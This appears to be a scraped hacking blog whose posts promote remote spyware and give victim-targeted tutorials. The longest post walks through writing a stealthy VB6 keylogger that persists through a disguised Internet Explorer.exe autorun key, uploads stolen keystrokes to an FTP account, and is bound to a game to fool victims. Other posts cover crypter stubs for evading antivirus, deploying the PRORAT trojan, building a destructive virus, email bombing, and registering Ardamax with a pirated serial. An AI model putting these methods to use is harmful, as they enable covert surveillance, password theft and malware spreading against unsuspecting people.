Hacking tools (16)


Remote password hacking software - sniperspy

 Are you looking for the Best Remote password hacking software? Do you need to spy on your remote computer without the need for physical access? But wait! Before you go for any remote spy softwareyou should read our shocking reviews!

Sniper Spy (Remote Install Supported)


Editors Rating: 8/10


Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!
remote password hacking software


remote password hacking software

SniperSpy Features:

1. SniperSpy is remotely-deployable spy software

2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!

3. Logs All Keystrokes

remote password spying software

4. Records any Password (Email, Login, Instant Messenger etc.)



5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall


What if i dont have physical acess to victims computer?


remote password hacking software


 No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.so what are you waiting for download sniper spy by clicking the download link given below



                                              

                                     Download SniperSpy Now! 




 





MONDAY, DECEMBER 6, 2010

Rapidshare hack - Download unlimited files parallely

Many of my blog readers were asking me is there any way to download rapidshare files parallely
after a lot of research i found a method in which you can download  any number  of files parallely
Follow the given steps to download files simeltaniously



1. First download the rapidshare hack  file from Here

2. Now save the rapidshare hack  file as rapidshare hack .bat
    (note :- You can save it as anyfilename.bat )


3. Now search for rapidshare premium link generators in google or use these rapid share  
    premium  link generators  given bellow

    LIST of 4 Best Premium Link Generators:


4. Now you can download  four files parallely after you finish the download Run  rapidshare hack.bat every time before you download the next set of files by this methoid we can download any number files parallely , without any waiting time




SUNDAY, DECEMBER 5, 2010

How To make your own FUD keylogger


After this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable, without the victim getting suspicious. You will be able to keylog just about anyone.




This Guide will be split into 2 parts:

1 Writing your own undetectable keylogger

The language
Logging and storing
Uploading logs


2. Setting it up to be un-suspicious and trustworthy

Binding with other files
Making sure its existence is hidden


Before we begin I want to point out that this keylogger is NOT perfect.It will be unable to recordsome symbols It will occasionally rearrange a letter with one another if the user types fast But the passwords should easily get through.
WRITING A KEYLOGGER !
In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not "Necessary" to have vb6 knowledge (highly recommended)

Download VB6 Torrent now.


Open up VB6 and choose standard EXE.
Put on your form:
3 timers
1 label







Double-click your form (design) and you see the source of our keylogger, almost empty at this point.







Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.




Go back to the source and write the following in the "Form_Load" sub

If app.previnstance = true then end

app.taskvisible = false
Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)
Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar
There are 2 effective methods to keylog with VB6

- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:

^ tells what Lib we need for GetAsyncKeyState.
With this code placed we can start using GetAsyncKeyState commands.
To find out what key is pressed we need to use getasynckeystate as so:
If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressed
end if
Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key, you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
http://msdn.microsoft.com/en-us/library/aa243025(VS.60).aspx
Full list of KeyCode values Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only. But i want it done properly so I am going to check One key at a time. You can decide yourself what you want to do.I will show you the easy method too later on tho. Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell. Set the caption of the label to nothing. Now a full example of the letter "a" would be this:


if GetAsyncKeyState(65) <> 0 then label1.caption = label1.caption + "a" end if


So that if "a" key is pressed an "a" is added to our label. Code 65-90 is a-z To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds).
You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer If you have less interval, it might double record the keystroke, if you have more, it might miss it. To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner ofthe source page, or double-click the timer icon on the form design Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad) Now it records letters and numbers, not bad, but we are far from done yet. If we finished up now our logs would be one big pile of letters, pretty much unreadable. So what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces. So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks. Now, were not done just yet. We want to check if a letter isCapital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead. Now to do this, we want to use booleans (true / false), so goto the general section and write this: The keycode for capsLock is 20. We want to write capslock like this in the timer.
if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if
a:
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True". The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is allcapital . Nice! Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean. Its a little different with shift. Shift has the keycode 16 btw. dim "shift" as boolean inthe general section. just like before.
If GetasyncKeyState(16) <> 0 then
shift = true end if
So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this: example with "a" key:
if GetAsyncKeyState(65) <> 0 then

if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if
b:
(remember to use a different letter(s) in the goto commands every time) So if Shift has been pressed, the next key being pressed will becapital.
Nice!
NOTE: You can do this with numbers too to get their symbol instead. You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9. Now. 2 very important keycodes are missing on the site, so i put them here Dot: Getasynckeystate(190) Comma: Getasynckeystate(188) We are now able to go to the next step. Writing to a Text Document. Having the logs in a label is not enough. We need to write it to a text-file every now and then. This process is really simple actually. Open up the source for the second timer (Timer2) and write following. I will explain below the quote.

On Error Go To skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Else
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1, Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""
skip:




don't worry, ill explain. The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below "Else" the "Open" creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look. the "for output as #1" just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is useful for keeping track of when the specific log were from. In this case we only use Output and Append
"write #1, label1.caption" this writes the content of our label into file #1. "close #1" closes the file. 'Label1.caption = "" ' This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly. I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer) As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file every Time the keylogger is being opened again (usually after shutdown) So write this to the "Form_Load": So now it stores Time marks every time its opened. NEAT! now every 30-60 seconds all logs is stored in a text document. At this point you should try debugging the file. (little blue triangle button)







you will see nothing. but the keylogger is running.. try opening notepad or something and type something. after a minute or so, stop debugging (square button right of the debug button) and check the textfile (at your chosen location) it should contain everything you wrote. If not. Re-Check the last steps. Now. an important thing we must not forget is to make it run on startup =) there are 2 ways to do that, i will explain them both and let you choose which one to use. 1: Registry keys Here we copy the file to system32 and add an autorun reg-key to it so it starts when you start the computer. here how to do it: First we want to see if it already has one start up key. go to the Form_Load section again and write this:
if Dir("c:\windows\system32\Internet Explorer.exe") <> "" then
else
regist
end if

This means that if the file in system32 (Internet Explorer.exe) already exists (will explain the name later) then it does nothing but if the file does not exist, it calls the sub called "regist". which copies the file and add a registry key to it. We're gonna write the "regist" sub now: add this at the bottom of the code:
Private Sub regist()
Dim regkey
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\system32\Internet Explorer.exe"
Set regkey = CreateObject("wscript.shell")
regkey.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe", "c:\windows\system32\Internet Explorer.exe"
End Sub
This copies the file iteself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key to it. That,s basically the registry method.


Here is the Other method.

2: Copy to start up method. again, start with going to the Form_Load (IF you choose to use this method) and add "startup" which calls the start up sub we are about to make. Make a new sub called startup at the bottom of the code, like this: This searches for the Special folder "startup" and copies itself to there with the Internet Explorer name, If you want you can add VB attributes (setattr commands), like vbhidden or vbsystem. but i don't recommend that Because i had some problems with those attributes myself


Now choose one of the methods for startup (not both of them tho) and move on.
Now The final part is the most important one.
This is where we Upload the textfile to our FTP account.
You MUST have your own ftp account for this part.
I suggest using http://www.0catch.com (its a zero), there you can create a free account.
Create a free ftp account there.
Once you have your FTP account.
We need to add a Internet Transfer Control component to our form.
You do that by going to Project >> Components. (ctrl + T) Find Microsoft Internet Transfer Control 6.0 and Tick it





press ok.
Now a new item is available in the toolbox (Inet).
drag it to your form.
select properties for it:
Protocol: icFTP
Username: Username.0catch.com (your 0catch username)
Password: your 0catch
Password Remotehost: www.0catch.com and thats it.
Now the "URL" should say something like this:
ftp://username.0catch.com:password@0catch.com


Now we are connected to the FTP when executed.
We must use this connection to upload the logs to the FTP. we want to do that about every 90 seconds (since 90 seconds is max interval in timers). set Timer3's interval to 90000 (1½ minute) or less. then in Timer3's source write this:
On error resume next
Inet1.Execute , "PUT c:\windows\klogs.txt /" & DateTime.Date & ".txt"
Now, this finds our log (klogs.txt) and uploads it to the selected FTP, the files name will be the date of the day it is being run. This is so we can prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The "On error resume next" prevents the program from crashing if one log fails to upload. but instead tries again (errors happen rarely tho, but recommended to have) if you have a sub folder for the logs you can type "/subfolder/" & DateTime.Date & ".txt" Was that it? YES! its really that easy to upload a file. woowee!
Now. in the "LOAD" part add this:
label1.caption = ""
To make sure the label is empty when opened.
Now i promised also to show the lazy way.. which is not as good.
I DO NOT RECOMMEND USING THIS: this method uses Integer and a loop to do all keys.
In this method "i" is 1-120. "i" starts being 1, and every time it reaches the next command it starts at "for" as 1 higher. untill 120.
All letters will be caps and a lot of weird symbols will appear. "chr(i)" chr = character, "i" is again, the keycode.
AGAIN: I RECOMMEND IGNORING THIS PART OF THE GUIDE. its not that good.
Now, go to the design again and click the form itself (not any of the items inside the form) look through the options and find the Icon option. change the icon to Internet Explorer Icon
Guess what. were almost done.
We now should have a very undetectable keylogger (80-95% UD) NICE!. give it a test shot on your own computer by saving it as .EXE to your computer (debugging wont work now since we made it copy itself). At this point you should save the project to your computer, you can also make the EXE file.(Save as Internet Explorer.exe) That,s it for the first part. Get ready for part 2!


Setting it up to be trustworthy !


Now. An EXE file that appears to do nothing when opened seems a little suspicious, doesnt it? So there is a few ways to disguise it. 1. Binding it with another file. 2. Writing another program into it in VB6.


I prefer the first solution since it takes a long time to make it look like the game etc. closes when close button pressed. And it would take multiple forms as well.. so we will stick with Binding with another file or game of yours.


DO NOT use minor binding tools like Fresh Bind or alike.
Many of these makes the output detectable..
USE nBinder PRO, nBinder only makes it slightly more detectable.


Once you have nBinder PRO its time to make the keylogger EXE.
You do that in file >> make project.EXE (Save as Internet Explorer.exe, will explain..) when the EXE is created its time to find a file (preferably a game or alike) to bind it with.


Open Up nBINDER PRO.
Add the keylogger and the file to be bound with.
Right click the Keylogger (inside nBINDER) and select Options.


Tick "Execute" box (if not already ticked) and Tick "Start visible" box (if not already ticked)


Untick "Delete file at next boot" if you want the keylogger to stay in the file after first boot.
Now select options on the other file.
IMPORTANT: Tick EXECUTE and "START VISIBLE" here.
UNtick delete at next boot.
Now select iconfile and output name, compress the file.
Almost done now.
The reason it should be called Internet Explorer.exe and have Internet explorer icon (and copy as internet explorer.exe for that matter) is because some firewalls detects the FTP file uploading. and when the time comes when firewall asks if you want to allow the program internet connection, it will ask: Internet explorer is trying to access the internet .
Block / Remove Block. and display Internet Explorer icon.
That way it looks like its just IE that tries to get to the internet.. you can use other browsers for this as-well.. or messenger etc. Now my friend. when the file is executed. The game (or w/e) will launch immediately. when the game is exited the keylogger starts logging invisible. (and is copied to start-up / added a regkey) The victim shouldn't notice a thing. and very soon you will be the owner of their passwords =).




SUNDAY, JANUARY 3, 2010

Rapidshare Premium hack

Happy new year to all my viewers . It is a new year a new beginning so i have decided to give my viewers a new year gift

In this post i am going to give you free rapid share premium accounts




Rapid share Premium hack

1 . download rapid share premium accounts here
2 . open pass.txt

3. you can use all the premium accounts
Enjoy downloading ,please thank me in comments


NOTE : FIRST COME FIRST SERVE


SUNDAY, DECEMBER 27, 2009

How to Create your own Crypter stubs


Hello friends. In my previous article on fud crypter one of the viewrs wanted me to do a post on stub crypter
so i did a post on stub fud

How to make Virus undetectable:

Usually, Viruses are detected because their stubs are detected as viruses by AVs. So, if you change stub of viruses, most of times, they become undetectable to antiviruses. So, I am explaining you how to create your own stub and how to use this your self-created stub to make your virus FUD (Fully UnDetecatable) to antiviruses. This Crypter is tested by me and found working well on Windows XP and Windows Vista.

STUB :

just select the antiviruses you wanna bypass. Now, create stubs and start scanning them at novirusthanks.org. This method is used to collect and group stubs undetectable by specific antiviruses. Here is one stub which is not detected by most famous AVs as today's scanner results indicate:
- Avira
- AVG
- Avast
- Bit Defender
- Kaspersky
- Quick Heal
- Panda

Free Download this Stub over here.


Develop your own stubs. Now, all resides on you to make your trojans and viruses undetectable, since you are now able to develop your own stubs.

Screenshot - Creating method stubs
The stub looks like this:

Note : to compile your stub, you should have Microsoft Visual Basic 6 installed on your computer.

So friends, I hope this tutorial on
how to make your own stubs
to make your virus trojan undetectable by antiviruses will be helpful to you. If you have any problem , please mention it in comments.

Enjoy and make your trojans undetectable...


SATURDAY, DECEMBER 19, 2009

PRORAT - hacking continued


In my previous article PRORAT - Remote PC access software, i mentioned about how to create PRORAT server for
hacking computer remotely.

Now, after server creation, you have to send server to victim and then install server on victim computer to hack computer remotely. I have explained this next part of hacking computer remotely using PRORAT here in this security article.

PRORAT server

HACKING COMPUTER REMOTELY - PRORAT:


1. Once you have created server, send this server to victim and ask him to install on his computer. If you have not read my previous article on PRORAT server creation, go back and then return here. You can bind server to say any pic or song using binder software , so that victim does not know of server installation.

2. When server is installed on victim computer, the only thing you should know is victim IP address, which you can know by various methods. I have written an article on How to Find IP Address... just read it to obtain victim IP.

3. When you know victim IP address, half part of hacking computer remotely is completed. Open Prorat on your computer and enter the victim computer IP address in text field adjacent to IP.

4. Let port remain the same. Usually this is the port opened by PRORAT server on victim computer.

5. Now hit on Connect and PRORAT will try to establish connection with server on victim computer for hacking computer remotely. Once connection with remote server is established, you can use PRORAT for hacking computer remotely.

6. You can use any of options on left option pane of PRORAT for hacking computer remotely. I will not go in details for this.

That's it. Thus, now you are able to use PRORAT for hacking computer remotely. PRORAT is used since long time to hack computer remotely and is still a working method to hack computer remotely. If you aren't able to
use PRORAT for hack computer remotely,
please mention it in comments.

Enjoy PRORAT for hacking computer remotely...






Gmail hacking software




In my previous post i explained how to hack hotmail accounts today i will explain how to Hack gmail account

I searched a lot for this gmail hacking software to hack gmail account and now presenting you with this gmail hacking software. This software Mess Bomber - is used to hack gmail account by sending unlimited gmail emails to gmail account. I have provided link for software download.

Hack gmail account password

GMAIL HACKING SOFTWARE TO HACK GMAIL ACCOUNT :


1. Free Software Download Gmail hacking software to hack gmail account.

2. Unzip the downloaded file using Winzix to obtain Mess Bomber.exe file.

3. Run the gmail hacking software on computer (supports windows XP and also windows Vista) and you will see something like this :



4. Now, fill the fields as below :

# To : Victim to be bombed with email to hack gmail account
# How many times : No. of times to send email
# Subject and Message : This will appear as subject and body content of emails.

5. In SMTP Settings, just fill in your Gmail username and password. Don't worry, the victim won't know whose is hacking Gmail account and sending email.

6. Just click on "Bomb" when you are connected to internet. The emails will be sent bombed to his Gmail inbox and thus you can hack Gmail account.


That's it. You can use this
gmail hacking software to hack gmail account.
This gmail hacking software was developed by Messhacker. This gmail hacking software can also be used to hack other email accounts like Yahoo etc. I have just illustrated about how to use this gmail hacking software to hack gmail account. If you have any problem in using this gmail hacking software, mention it in comments.


THURSDAY, DECEMBER 10, 2009

FUD CRYPTER : by pass anti virus detection


I have already written about RATs in my previous article PRORAT - Remote pc access software. I have mentioned about antiviruses detecting RATs as hacking softwares (viruses) and hence, hacker has to use Crypters to avoid antivirus detection for RATs. So, read on to know more on Crypters - hacking software for bypassing antivirus detections. I have provided link for software download.



WHAT IS CRYPTER??


As said above, Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.

If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.

What does Crypter do???

Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.

What is FUD ???

FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Ardamax keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.

So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain "FUD" for maximum of one or two days after their public release. so i am going to give you a fud crypter witch is rare to get so please thank me in comments

DOWNLOAD - FUD CRYPTER

In my next post i will explain how to use fud crypter . if you have any promblems downloading the file you are free to comment
enjoy hacking........




FRIDAY, NOVEMBER 27, 2009

PRORAT : Remote PC Access Software


In my last articlas about hard ware key loggers and adramx key logger , i am posting this security article to inform about installation and use of PRORAT. PRORAT is a RAT (Remote Administration Tool)used as
remote pc access software.

remote pc access software.
PRORAT hacking software


PRORAT - Remote pc access software:

1. Download PRORAT software for remote pc access.


2. Unzip downloaded file using Winzix to use this remote pc access software

3. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.

4. Now, we have to create a server to send it to remote computer for remote pc access. So, click on Create ->Create Prorat server.

5. Go to no-ip.com and register for an account.


Remote pc access software PRORAT
6. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip and let all remaining fields remain unchecked.

7. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.

8. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.

9. To change server default icon, click on "Server icon" on left option pane and select any suitable icon according to binded file.

10. Now, when all things are done, hit on "Create server" and you will get server created in Prorat directory. This server is used for remote pc access.

11. This ends server creation part over here. Just refer Remote pc access tutorial for more information.... the best PRORAT tutorial i found.

You will require to have Winzix to get PRORAT - remote pc access software. Download Winzix here.


Now, when you have created PRORAT server, next step is to send this server to victim computer and then use PRORAT for remote pc access. You can use Binder to avoid our server trojan from being detected by antivirus. I will explain in my next article about how to connect to remote PRORAT server on remote victim computer and then use this for remote pc access. If you have any problem in using this
PRORAT for remote pc access,
please mention it in comments section.

[update : you can use fud crypter to by pass antivirus detection]

Enjoy remote pc access software...

MONDAY, NOVEMBER 23, 2009

Virus creator to create torjan virus


This virus creator software is easy to use and is used to create virus trojan which harasses user. In this article, I have explained how to create torjan virus

VIRUS CREATOR TO CREATE VIRUS TROJAN:


1. Download VIRUS CREATOR S
oftware to create virus trojan.


2. Unzip the file using Winzix ( download here) to obtain Virus creator to
create virus






3. Run Virus Creator V.65 on your computer to get something like:
Atomic virus creator

4. Now, Virus creator will ask you for various options listed below:

name of virus
# Save virus to startup
# Save to homedrive
# Save to system32
# Save to desktop
# Disable scheduled tasks
# Create 10 users
# Corrupt system files
# Open 10 command windows
# Start world's most annoying webpages 10 times
# Reset time to midnight
# Memory leak

These options determine effectiveness of your virus. You can choose options preferences as you like and depending on amount of damage you wish the virus should do to victim.

Now, when you have selected preferences, simply press enter and virus creator software will create virus trojan for you.

5. Now, all you have to do is send this created virus to your victim and ask him to run this virus on his computer(Social Engineering). You can use Binder to make this virus undetectable from antivirus and even prevent doubt of victim. 

You will require to have Winzix to download Virus creator software. Free Download Winzix here. Remember to install.
Thus, you now know how to create virus trojan using Virus creator software. Remember to bind this virus with Binder. I have tried to keep this virus creator tutorial simple. If you have any problem in usingvirus creator to create virus,please mention it in comments.

Enjoy Virus creator software to create virus...


SUNDAY, NOVEMBER 22, 2009

Binder software to disable Antivirus detection



What is Binder???

Binder is a free software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.
thus Binder is used to bypass antivirus detection.
I have provided link to download binder.



HOW TO USE BINDER???


1. first of all, you need a binder. So, download freeBinder software.


2. Unzip the downloaded file using Winzix (free download here) to obtain Binder setup.

3. Install software on your computer to see:
Binder software to disable antivirus

4. Now, click on "Select File #1" and select thekelloger or RAT you wanna bind to avoid its antivirus detection.

5. Click on "Select File #2" and select the normal file with which you wanna bind our trojan, RAT or Kelogger.

6. Simply, hit on "Bind" to obtain the binded keylogger or trojan file. Now, simply send this file to victim whom this file will appear normal (trojan is hidden due to binding).

7. Remember to check both "Execute"options and you can use "EXE Pump" to increase your file size to desired value.

please post comments



TUESDAY, NOVEMBER 3, 2009

MagicBlueHack v. 1.0

X2Blue v. 1.3

MagicBlueHack is a Mobile Hacking software.By using this Software on your mobile you can access another Bluetooth mobile such as make Call(Free), Send SMS(Free), Read Phone Book and Read SMS Inbox from another Mobile without notifying the owner...

MONDAY, NOVEMBER 2, 2009

Proxy Switcher 4.2.0 Build 5101



Very useful program for those, who regularly encounter problem, as to skachat' is free of charge much file with Rapidshare or wants to hide its real IP. You do want to deceive RapidShare, Megaupload, DepositFiles and others? - there is nothing simpler! Proxy Switcher Simply changes your host country "in flight"! Speaking in another language, changes your IP- address by proksi.Programma Proxy Switcher Pro it will scan, it protestiruyet and will find for you more than 100 high-speed proxy with the reflection of the flags of countries and time of response.Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher offers full featured connection management solution. This includes flexible proxy server list management, proxy server tester and anonymous surfing capabilities.

Proxy Switcher Features
• Change proxy settings on the fly
• Automatic proxy server switching for anonymous surfing
• Works with Internet Explorer, Firefox, Opera and others.
• Flexible proxy list management
• Proxy Server Anonimity testing testing
• Anonymous proxy server list download

Proxy Switcher Benefits:
*Hide your IP address from the web sites you visit.
*Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
*Automatic proxy server switching for improved anonymous surfing.
*Easy way to change proxy settings on the fly.
*For webmasters - check search engine results from different countries.
*Fully compatible with Internet Explorer, Firefox, Opera and others.
*Advanced proxy list scanning and management.

Homepage:- www.proxyswitcher.com



Angry IP Scanner 3.0

Angry IP Scanner screenshot

Angry IP scanner is a very fast and small IP scanner. It pings each IP address to check if it's alive, then optionally it is resolving hostname and tries to connect at specified in Options dialog box TCP port. The program uses separate threads for each scanned address to reduce scanning speed. It can also display NetBIOS information: computer name, workgroup, currently logged user and MAC address....


Hacking vd keyloggers

i m going 2 tell about keyloggers.
first theory portion den practical portion vl come.


theory part--->
keylogger is a software by vch u cn know vch buttons get pressed on d computer
suppose dt u r installing a keylogger on ur computer den all d buttons vch vl be pressed on ur computer u cn have der information thru ur keylogger software.
its a very good tool coz u cn install dis in cyber cafe and wenever u vl sit on dt computer in cyber cafe u cn watch all person's login information and all der activities vch de did on dt computer.
good keyloggers r
ardamax keylogger
spytector and a few more.

till d moment ,d keylogger vch i discussed is d keylogger vch cn be installed only on a computer and 4 installing dt u must hav access 2 dt computer.
bt der is andr type of keylogger also.
andr keylogger is "remote type keylogger"
see,d keylogger about vch i discussed previously dt keylogger needs 2 be installed by person on dt computer means u must n must hv phusical access 2 dt computer bt suppose dt u want 2 get keystrokes of ur freind who is in andr state den?
in dt case u need 2 use"remote type keylogger"
in dis type of keylogger
we just make a server file.
infact in dis type of keyloggers,der is a main setup file ,
4m dt main setup file u make a remote file vch is known as server file and den u send dis remote/server file 2 ur freind or any person and if he double click on dt server file den all d buttons vch he will press,de strokes information vl come on ur email id.


nw its d time 2 do practical.
let's start.
PRACTICAL PART---->
download ardamax keylogger.


nw u cn install dis on ur computer and can know vch buttons r getting pressed .
nw i m going 2 tell u hw 2 make a server file.
step 1-->download ardamax keylogger 4m here.



http://www.easy-share.com/c/1700470036

nw install dis.
after installing ,look at ur right side tray icons.
u vl see der a new white colour icon.
dt is ardamax.
nw right click on dt icon.
and choose"enter registration key"
nw it vl ask registration no and registration key.
registration name is
forumw
and registration serial is
JUTSORHVSCQQGUF


nw ur ardamax is fully registered.
nw



STEP [2]---->go at dt white clrd tray icon
right click and choose
remote installation
nw
press next for 4 times
nw it vl ask "check 4 updates"
disable dt
i mean uncheck dt
nw do next
nw give d sel distruction date
give it next 2 month or 3 month or any time
nw do next
nw it vl ask
send logs every
give der
send logs every 5 minutes
deleivery methode
email
and dont disturb vd odr options.
nw do next
nw
send to
give here
ur own email id
send from
give her
ur own email id again
smtp host-->press find

user name
give any user name
pasword
give any password
nw do next
nw do 4 times next
and u vl get a massage saying
deplosive package made successfully
and ur
htv.exe
named file vl be appear 2 u
nw u hv 2 send dis file 2 ur victim and wen he vl double click ,his all keystrokes vl come on ur mail id.
mind it,dese email contain details of his all keystrokkes and most often dese email comes in d spam/junk box
der4 check dem ur spam/junk box also.
have fun.

see,der r many more keyloggers bt only few of dem gratns u such facility 2 create a server file like u made in ardamax.
anyways
i think most of u r familiar vd dis ardamax keylogger bt d problem vd ardamax keylogger is
wen u send d server file 2 ur freind den wen he double click on dt server file den d warning masage come
"it vl install ardamax keylogger monitoring tool on ur computer"
and wen victim press ok den his keystrokes come 2 u
many ppl wants 2 change dis warning line.

here is d most ultimate keylogger "spytector"
u cn chnage even d warning line in dis keylogger,.
its main setup file is detectable 4m antiviruses bt d server file vch u create vd dis spytector,dt is undetectable 4m nearly all antiviruses.
dealing vd it is same as dealing vd ardamax.
go on all options and make a server file and send 2 d victim.

have fun guys.